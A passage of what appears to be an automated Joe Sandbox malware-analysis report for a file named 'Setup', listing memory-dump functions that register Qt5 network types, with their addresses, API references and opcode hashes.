                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkSession::SessionError
                                                                                                                                                              • API String ID: 109532953-3125804625
                                                                                                                                                              • Opcode ID: 4646572b67542b0be593eef580f3cc5fd8efe5ba274bc14fa54dfdef041d76d3
                                                                                                                                                              • Instruction ID: 9ce1f8cc0f7ec5a2de343665d40d54f3110d02b181d5f83a42ef8938e65b04ec
                                                                                                                                                              • Opcode Fuzzy Hash: 4646572b67542b0be593eef580f3cc5fd8efe5ba274bc14fa54dfdef041d76d3
                                                                                                                                                              • Instruction Fuzzy Hash: 2411FCF5A0EA8292FB92CB35E8501A46761FF54754F804136DE6D872A0EF3CE909CF04
                                                                                                                                                              Function 00007FFBA19E4380 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19E43C3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1478), ref: 00007FFBA19E43F7
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1478), ref: 00007FFBA19E4404
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19E443A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkConfigurationPrivatePointer
                                                                                                                                                              • API String ID: 109532953-264861295
                                                                                                                                                              • Opcode ID: a9c54800feef32012a34b17f0aac533e2bea2a75b15ef4d75aefe5481c5ec7c8
                                                                                                                                                              • Instruction ID: bf27df492aae65bb2b34e7cbcd6fa9f88187c733d87354b32be4b4a0eb8c7dff
                                                                                                                                                              • Opcode Fuzzy Hash: a9c54800feef32012a34b17f0aac533e2bea2a75b15ef4d75aefe5481c5ec7c8
                                                                                                                                                              • Instruction Fuzzy Hash: FB111AA5A0EA4286E792CF35E8801742761FF45754F808036DE1D832A1EF3CE98ADF44
                                                                                                                                                              Function 00007FFBA1990390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA198DFC5), ref: 00007FFBA19903D3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1990407
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1990414
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA199044A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkRequest::KnownHeaders
                                                                                                                                                              • API String ID: 109532953-1531910905
                                                                                                                                                              • Opcode ID: 003c3f02d114825d986182bf870e4fdeb90a2047dab07576c51604e52ba309de
                                                                                                                                                              • Instruction ID: e561525921e7227d1a290a64367b49d897477b4534b2df3e7b8ce49fc2057375
                                                                                                                                                              • Opcode Fuzzy Hash: 003c3f02d114825d986182bf870e4fdeb90a2047dab07576c51604e52ba309de
                                                                                                                                                              • Instruction Fuzzy Hash: CC11D6B5A0E68296EB928F24E8901AA6760EF54754F844036DE2D462A0EF3CE949DF04
                                                                                                                                                              Function 00007FFBA19792C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,?,00007FFBA1973167), ref: 00007FFBA1979302
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA197933D
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA197934A
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197938C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkReply::NetworkError
                                                                                                                                                              • API String ID: 109532953-3170863873
                                                                                                                                                              • Opcode ID: 0e7cd0cb06ec66cd6ca552a986537d4b5b919858c65a3a6fd380f8e526985165
                                                                                                                                                              • Instruction ID: 6e59375e623d434272e9c21dfde18e1fd3ef8b8c357b4eb5eae8789f76cb9e28
                                                                                                                                                              • Opcode Fuzzy Hash: 0e7cd0cb06ec66cd6ca552a986537d4b5b919858c65a3a6fd380f8e526985165
                                                                                                                                                              • Instruction Fuzzy Hash: D0213BB5A0EA82C6EB82DB24E8801A57760FF84B54F844036DE1D473A0EF7CE909CF04
                                                                                                                                                              Function 00007FFBA19DEAE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19DEB23
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1473), ref: 00007FFBA19DEB57
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1473), ref: 00007FFBA19DEB64
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19DEB9A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkConfiguration
                                                                                                                                                              • API String ID: 109532953-1564969325
                                                                                                                                                              • Opcode ID: a85197c5fa40f5c41f514cceb43437ceca8ca8b63a69dd35f53da858e681a29d
                                                                                                                                                              • Instruction ID: 5d2bc661a639bee8c3ebd7305aee39d5fba44c5c03a66ccb2b44e5f403b8e7c0
                                                                                                                                                              • Opcode Fuzzy Hash: a85197c5fa40f5c41f514cceb43437ceca8ca8b63a69dd35f53da858e681a29d
                                                                                                                                                              • Instruction Fuzzy Hash: 6811E4F5A0FA8292EB928B25E8941647760FF94764F804036DD6D822A4EF7CF949CF04
                                                                                                                                                              Function 00007FFBA1978E90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA197316C), ref: 00007FFBA1978ED3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978F07
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978F14
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978F4A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkProxy
                                                                                                                                                              • API String ID: 109532953-742907959
                                                                                                                                                              • Opcode ID: ee872f6c5f894b135f12777b3e556cd9ce65d6f8be10134703e03a9ba506a5a2
                                                                                                                                                              • Instruction ID: 9b9eb04378f4fb10d8fe7e6eee80cc68005ec20f4cdd9795cfa06ca1936cb5f4
                                                                                                                                                              • Opcode Fuzzy Hash: ee872f6c5f894b135f12777b3e556cd9ce65d6f8be10134703e03a9ba506a5a2
                                                                                                                                                              • Instruction Fuzzy Hash: 2611E7B5A0E642C2FB92DB34E8455656761FF54754F80453ADD5E422A0EF3CE949CF00
                                                                                                                                                              Function 00007FFBA1978DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA1980357), ref: 00007FFBA1978E03
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978E37
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978E44
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978E7A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkCookie
                                                                                                                                                              • API String ID: 109532953-517715147
                                                                                                                                                              • Opcode ID: 17faeb1464f95e40b027a67942841708b1ee0165e08525d6ec01e8dc8f7ec80a
                                                                                                                                                              • Instruction ID: 6b2693b8ac36a376c43069ca33cc6ce3a6c36ea61a18818c75d037b483744118
                                                                                                                                                              • Opcode Fuzzy Hash: 17faeb1464f95e40b027a67942841708b1ee0165e08525d6ec01e8dc8f7ec80a
                                                                                                                                                              • Instruction Fuzzy Hash: C21117A5A0E6828AEB928B24E84016A7760FF54754F80443ADD2D463A0EF3CE909CF00
                                                                                                                                                              Function 00007FFBA1978CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA1973185), ref: 00007FFBA1978D33
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978D67
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978D74
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978DAA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QHttpNetworkRequest
                                                                                                                                                              • API String ID: 109532953-2535381774
                                                                                                                                                              • Opcode ID: 87b4075cabd289e24a2b0f853764db53599853b9afae09752e41cbe620bcbc6a
                                                                                                                                                              • Instruction ID: acf936595c6c7c7d01a03f3afc1b3b39f383bc5887743fdccf21f7fdb0dd5c30
                                                                                                                                                              • Opcode Fuzzy Hash: 87b4075cabd289e24a2b0f853764db53599853b9afae09752e41cbe620bcbc6a
                                                                                                                                                              • Instruction Fuzzy Hash: 30112CF5A0E6829AE7928F34E8901AA3760FF54754F944036DD1D872A0EF7CE949CF04
                                                                                                                                                              Function 00007FFBA1979030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA1979073
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19790A7
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA19790B4
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19790EA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QtMetaTypePrivate::QSequentialIterableImpl
                                                                                                                                                              • API String ID: 109532953-4023160101
                                                                                                                                                              • Opcode ID: 225c0ffc10f25ced4f1a40a7590b0a093180c3d9cebfb46a50617f76a3753e06
                                                                                                                                                              • Instruction ID: d88ec12dc9adb9d650aea7713727a52f90bc66ef0a6cd3c47297d4172e01fbd5
                                                                                                                                                              • Opcode Fuzzy Hash: 225c0ffc10f25ced4f1a40a7590b0a093180c3d9cebfb46a50617f76a3753e06
                                                                                                                                                              • Instruction Fuzzy Hash: 9F11E7A5E0E6428AEB928F39E8401A56761FF55764F80413ADD2D472A0EF3CE949CF04
                                                                                                                                                              Function 00007FFBA1986880 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA198412A), ref: 00007FFBA19868C3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19868F7
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1986904
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA198693A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkRequest
                                                                                                                                                              • API String ID: 109532953-2472831940
                                                                                                                                                              • Opcode ID: 999a42ade22e9ce66cc9026eb06f787077708b4c8c3f563069f1971a7d088214
                                                                                                                                                              • Instruction ID: 40d0f9c2b86a7678d6c18b0e3d1f0951c393aa391ffd75ee3eecf8094eb2422a
                                                                                                                                                              • Opcode Fuzzy Hash: 999a42ade22e9ce66cc9026eb06f787077708b4c8c3f563069f1971a7d088214
                                                                                                                                                              • Instruction Fuzzy Hash: E111FCF5A0E6428AEB929F34E8816A86760FF54354F844136DD6D472A0FF7CE949CF04
                                                                                                                                                              Function 00007FFBA198C090 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFEA), ref: 00007FFBA198C0D3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA198C107
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA198C114
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA198C14A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkSession::State
                                                                                                                                                              • API String ID: 109532953-771365167
                                                                                                                                                              • Opcode ID: 79ba8e0edfd036c69250c23028dfd1e7c6af0b1453e13f8378ba4f6cf3a8470d
                                                                                                                                                              • Instruction ID: 9af03013eda4bace2b8e5679deeb5765a6d9cf3ddd8907abda2fe2875f28ef77
                                                                                                                                                              • Opcode Fuzzy Hash: 79ba8e0edfd036c69250c23028dfd1e7c6af0b1453e13f8378ba4f6cf3a8470d
                                                                                                                                                              • Instruction Fuzzy Hash: 7D11D6B5E0E64292EB92CB24E8901A56760FF54B94F804036CE2D472A4FF3CE94ACF04
                                                                                                                                                              Function 00007FFBA198BFC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFF4), ref: 00007FFBA198C003
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA198C037
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA198C044
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA198C07A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QNetworkSession::UsagePolicies
                                                                                                                                                              • API String ID: 109532953-1582409996
